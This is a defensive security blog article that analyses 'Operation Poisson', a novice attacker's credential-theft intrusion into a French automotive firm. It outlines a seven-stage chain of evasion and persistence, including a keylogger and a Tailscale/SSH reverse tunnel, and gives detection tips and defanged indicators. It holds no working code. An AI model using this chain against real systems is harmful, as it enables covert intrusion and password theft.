Access That Survives Its Own Takedown: The Operation Poisson Lesson
Access That Survives Its Own Takedown: The Operation Poisson Lesson
One of the most deeply held beliefs in incident response is that if you find and disconnect the server an attacker is using to control a compromised network, you’ve kicked them out. A recent case, documented in detail by security firm Cato Networks, shows that belief is no longer enough. An attacker with little experience — whom researchers nicknamed “Poisson” — compromised the network of a small French automotive company and, before losing control of his infrastructure, set up a way back in using two perfectly legitimate, everyday tools: Tailscale and OpenSSH. When his main server went down, his access stayed alive for 18 days.
The most revealing part of this case isn’t sophistication — the operator was a beginner who failed at nearly half of what he attempted — it’s how accessible a persistence technique once associated with advanced groups has become today.
Attack timeline
| Date | Milestone | Detail |
|---|---|---|
| MAR 30 (Day 1) | Initial intrusion · automotive SMB | Compromised in 83 minutes. Escalates to admin, creates a scheduled task, and installs RustDesk as a backup channel. Malware that runs in memory, barely touching the disk. |
| MAR 31 (Day 2-3) | Persistence and credential theft | Injects code into system processes. After a dozen attempts, a user accepts the permissions prompt and admin access is obtained. Deploys a keylogger. |
| APR 7 (Day 8) ⭐ | Installs Tailscale + OpenSSH | The key move. Joins the victim’s machine to his encrypted private network. Sets up SSH access and a reverse tunnel. Now he can get in without going through his C2 server. |
| APR 8 (Day 9) | The C2 server goes down | ✗ The main infrastructure goes offline. ✓ But the Tailscale access lives on a separate network. |
| 18 days without C2 | Access stays active, quietly | |
| APR 26 | The C2 comes back and the agents reconnect on their own | No need to attack anything again: the scheduled tasks, the SSH server, and the VPN mesh had been running for weeks. |
| APR 30 | Goes after higher-value credentials | Explores certificates and smart cards, and runs two programs from a mysterious file called Thales.zip. |
| MAY 1 | Deletes 17 files and disappears | The C2 shuts down for good and hasn’t returned. |
What happened?
Between March 30 and May 1, 2026, the operator nicknamed “Poisson” ran a credential-theft campaign against a small French automotive company and several private individuals in the country. The Cato CTRL research team at Cato Networks was able to reconstruct the entire operation — 339 commands over 33 days — thanks to a slip-up by the attacker himself: he left his access keys and a step-by-step instruction manual on an open cloud storage service, accessible to anyone. That turned the case into something unusual: an intrusion observed practically “over the attacker’s shoulder,” rather than reconstructed months later from the leftover traces of an attack.
Initial access relied on a chain of malicious programs designed to run in the machine’s memory, avoiding files on the hard drive that antivirus software could easily flag. Once inside, the attacker secured his presence using standard methods: a scheduled task that re-triggered at every login, and a remote desktop tool (RustDesk) as a backup channel. To steal information, he deployed a keylogger — a small program that records everything the victim types, passwords included, into a file. Curiously, he didn’t even automate the theft: he’d connect periodically and collect the file by hand. Up to this point, just another intrusion.
The turning point came on April 7. In an overnight session lasting about five hours, the attacker installed two tools on the victim’s machine that no antivirus flags as dangerous, because they aren’t: OpenSSH, the standard for secure remote connections present on practically every system in the world, and Tailscale, a popular private mesh-networking (VPN) service that businesses and individuals use daily to connect devices securely. With these, the attacker added the compromised machine to his own encrypted private network and set up an SSH connection with a reverse tunnel. The result: a direct line into the machine, encrypted, with no ports visible from the outside, and completely independent from his Command and Control (C2) server.
The payoff from that move showed up a day later. On April 8, the attacker’s main infrastructure — his C2 server — went offline. In a textbook scenario, that would have meant the end of his access. But because the Tailscale pathway ran on a completely separate network, the access survived. When the C2 server came back online on April 26, 18 days later, the programs installed on the victims’ machines reconnected on their own, with no need for the attacker to re-compromise anything.
Technical anatomy: the seven stages of the attack chain
The chain reconstructed by Cato consists of seven stages. It’s worth walking through them, because together they form a modern, comprehensive playbook for evasion.
-
sys.vbs— the stager. [Evasion] A 1.1 KB AES-encrypted VBScript. It runs a 120-second sleep to dodge automated analysis sandboxes, then decrypts a PowerShell payload, splitting theInvoke-Expressionstring to evade static detection. -
senti.dll— the matryoshka doll. [Fileless payload] A 3.1 MB .NET DLL that encodes shellcode as 207,813 English words. Inside, a Donut-style reflective loader wraps the Demon agent from the Havoc framework. Five layers of nesting, an implant of barely 50 KB, zero files on disk. -
The UAC “bypass” that wasn’t a bypass. [Privileges] The elevation kicked off with
Start-Process -Verb RunAs, which isn’t silent — it triggers the Windows consent dialog. On Victim 3 it took a dozen attempts before the user accepted it. -
Redundant persistence. [Persistence] A scheduled task called
TaskAdmin1that runs at every login with top-level privileges, a shortcut in the Startup folder, and shellcode injected intoExplorer.EXE. Three overlapping mechanisms. -
RustDesk. [Secondary channel] A custom-compiled build of this remote desktop tool, configured with the attacker’s own relay. A backup channel independent of Havoc.
-
The keylogger. [Theft] A 70-line Python script using
pynputthat logs every keystroke to a local file. No beacon, no exfiltration server: ~3,000 characters per session, collected by hand. -
SSH and Tailscale. [C2-independent persistence] OpenSSH Server and the Tailscale VPN mesh, with key-based authentication and a reverse tunnel. The access layer that survived the C2 takedown.
Analytical takeaway. No single stage here is novel on its own. The value of this case lies in the integration: a fileless, five-layer chain, triply redundant persistence, a theft channel with no network traffic, and a persistence layer built on top of legitimate infrastructure. It’s the operational maturity of the whole that deserves attention.
Blending into the network: “Living off the Land”
Why was an attack carried out by a beginner so effective? The answer lies in a technique known in the security world as “Living off the Land”: instead of bringing in flashy malicious tools that defenses recognize and block, the attacker leans on legitimate, signed, trusted software that’s already part of the normal landscape of any corporate network.
Most antivirus software and protection systems work, to a large extent, by identifying known “bad files.” But Tailscale and OpenSSH aren’t bad files: they’re legitimate, widely used programs, digitally signed by their makers. A security system that only looks for known threats has no reason to raise an alarm when it sees them. The traffic they generate, on top of that, travels encrypted, so it blends naturally into a company’s regular communications without raising suspicion.
In other words, the attacker didn’t pick the lock — he used a legitimate copy of the key. His access blended into what any network would consider routine activity. That’s why detection that stops at the level of “this file is malicious” is blind to this kind of maneuver: what’s suspicious isn’t which program is being used, but the context in which it shows up.
The evolution of threats
This case illustrates a deeper shift in the threat landscape that deserves attention. For years, the dominant narrative has centered on the big players: organized ransomware gangs, state-sponsored actors, espionage operations with multi-million-dollar budgets. But the everyday reality for small businesses and individual users — the ones without a dedicated security team — is increasingly shaped by a long tail of low-level operators who, without major resources or expertise, manage to pull off notable results.
“Poisson’s” profile is telling. Everything points to someone still learning: his active hours matched a school schedule (active in the afternoons, with a long midday gap), and he built his entire operation on free services — to the point that one of them ran out of its free download quota mid-attack and locked him out for hours. His carelessness was such that he left his own keys and manuals out in the open for anyone to find.
What matters is how an attacker like this achieves his goals. Rather than developing sophisticated tools, these operators are learning to exploit the trust placed in legitimate platforms and services. The barrier to entry into cybercrime keeps dropping, and the line separating the amateur from the professional blurs when both lean on the same legitimate toolbox.
Security and prevention tips
This incident leaves practical lessons for any organization, regardless of size or whether it has a dedicated security team.
For any user or organization
- Keep track of remote access software. OpenSSH, Tailscale, RustDesk, AnyDesk, and similar tools are legitimate, but they should be inventoried and authorized. If they show up on a machine with no clear reason, investigate.
- Be wary of unexpected permission prompts. The attacker only got elevated privileges because someone clicked “Yes” on a window they weren’t expecting. If you didn’t trigger the action yourself, deny it.
- Turn on two-factor authentication (2FA). The target was passwords captured by a keylogger. A second factor means a stolen password alone isn’t enough.
- Don’t rely on traditional antivirus alone. Solutions that only look for “bad files” won’t catch the abuse of legitimate software or in-memory chains. Pair them with behavioral monitoring.
For administrators and IT teams
- Treat an OpenSSH server (
sshd) installed on Windows desktop machines as a high-risk signal. It’s rarely legitimate outside of servers, and it was key to persistence in this case. - Watch for Tailscale showing up — or any mesh VPN — on machines with no operational reason to be running it.
- Apply the principle of least privilege. The fewer users with admin rights, the harder it is for an attacker to gain a foothold.
- Periodically review scheduled tasks, auto-start services, and privileged accounts.
- Block free dynamic DNS services (DuckDNS, No-IP) at the organization’s resolver unless there’s a justified business need.
For security teams and SOCs
- Detect reverse SSH tunnels (
ssh -R) from internal machines to external servers. - Alert on
wscript.exerunning.vbsfiles from user temp folders. - Monitor changes to power settings (
powercfg). - Watch for code injection into legitimate processes (such as
Explorer.EXE) and hidden PowerShell execution. - Shift from signature-based detection to behavior-based detection. The final-stage tools are legitimate, signed binaries; no file signature will catch them.
⚠️ The central lesson for incident response. If you take down the server an attacker is using to control a machine, don’t consider the incident closed. Assume he may have left other ways in, and actively look for remote access services, tunnels, or VPN meshes installed during the intrusion. Shutting down the attacker’s server is one step, not the finish line.
Indicators of Compromise (IOCs)
For anyone who wants to check their own environments, Cato published the technical indicators from the operation. IP addresses and domains are “defanged” (bracketed) to prevent accidental clicks.
Network infrastructure
| Indicator | Description |
|---|---|
217[.]154[.]217[.]139 |
Havoc C2 server (IONOS, Berlin) |
217[.]154[.]162[.]45 |
C2 redirector (IONOS, Berlin) |
wawsenti[.]duckdns[.]org |
TLS certificate CN for both servers |
pois43[.]s3[.]eu-central-003[.]backblazeb2[.]com |
Payload storage |
w456w5[.]s3[.]eu-central-003[.]backblazeb2[.]com |
Payload storage |
sentiwaw[.]s3[.]eu-central-003[.]backblazeb2[.]com |
SSH manual |
Files · SHA-256 hash
| File | Hash |
|---|---|
sys.vbs |
aa7ea19e34567458b4ee66a7cd274181764984bf32123f756a7fdc64d5857b31 |
senti.dll |
3b7642b0f84e83a36334c608655c6cb7aae774839a6a3488526b853d89830a60 |
KeyL.zip |
1f00fd604bb18bbe3081f9ce8d741c4029d2a2125eb8888ac4e0d955938059d6 |
Thal.exe |
0378a5ef51b008aa2d6b76bd44a0bf061339bc3b737a188ec82029444d4d18fe |
Additional: RustCustom.zip, SSH.zip, RevS.ps1 (full hashes in Cato’s report).
Traces left on the machine
- Scheduled task
TaskAdmin1— runs at login with top-level privileges. sshd(auto-start) and Tailscale services.- Firewall rules
RustDesk Full AccessandSSH.
Operator identity
- Aliases
Poisson,Stikou68. - Linux
avenger@ubuntu, path/home/avenger/Desktop/. - Storage buckets
pois43,w456w5,sentiwaw.
Technical summary
| Field | Detail |
|---|---|
| Case name | Operation Poisson (Cato CTRL / Cato Networks) |
| Attacker | “Poisson” — novice operator, not an advanced group |
| Attack goal | Credential theft (banking, email, government portals) |
| Victims | A French automotive SMB and four private French individuals |
| Legitimate tools used | Tailscale, OpenSSH; RustDesk as backup |
| Initial access | In-memory malware chain (Havoc framework) |
| Data theft | Python keylogger, manual collection, no exfiltration server |
| Persistence type | C2-independent access via Tailscale + SSH with reverse tunnel |
| C2 status | Went down on April 8; access survived; returned on April 26 (18 days later) |
| Total duration | 33 days (March 30 – May 1, 2026); 339 commands logged |
| Notable technique | Living off the Land |
| Main lesson | Shutting down the C2 server doesn’t equal remediating the intrusion |
Wrapping up…
The main takeaway from Operation Poisson is both simple and profound: in cybersecurity today, the most dangerous thing doesn’t always look like a threat. An attacker without much expertise pulled off lasting, quiet access not by overpowering defenses head-on, but by hiding in plain sight, using the same legitimate tools organizations rely on every day.
For businesses and administrators, the preventive lesson is clear: modern protection isn’t just about blocking the obviously malicious — it’s about knowing your own environment inside and out: what software is authorized, what behavior is normal, and what connections make sense, so you can tell legitimate use apart from abuse. And when it’s time to respond to an incident, it’s worth remembering that neutralizing the attacker’s visible tool is just the beginning; real remediation requires making sure he hasn’t left any door half-open.
Sources consulted
Cato Networks. (2026, June 16). Cato CTRL Threat Research: Operation Poisson – Analyzing a Cybercriminal’s Entire Operation. https://www.catonetworks.com/blog/cato-ctrl-operation-poisson-analyzing-a-cybercriminals-entire-operation/
Khandelwal, S. (2026, June 17). Junior Hacker Used Tailscale and OpenSSH to Keep Access After His C2 Went Offline. The Hacker News. https://thehackernews.com/2026/06/junior-hacker-used-tailscale-and.html
SC Staff. (2026, June 18). Attacker establishes persistent access to French business using OpenSSH and Tailscale. SC Media. https://www.scworld.com/brief/attacker-establishes-persistent-access-to-french-business-using-openssh-and-tailscale
Q2BSTUDIO. (2026, June 17). Hacker junior usó Tailscale y OpenSSH para mantener acceso tras caída de su C2. https://www.q2bstudio.com/nuestro-blog/1990627/hacker-junior-tailscale-openssh-acceso-persistente-c2
Mia, A. (2026, June 18). Young hacker used Tailscale and OpenSSH to break into French car manufacturer. SecNews. https://www.secnews.gr/en/715954/hacker-chrisimopoiise-tailscale-openssh/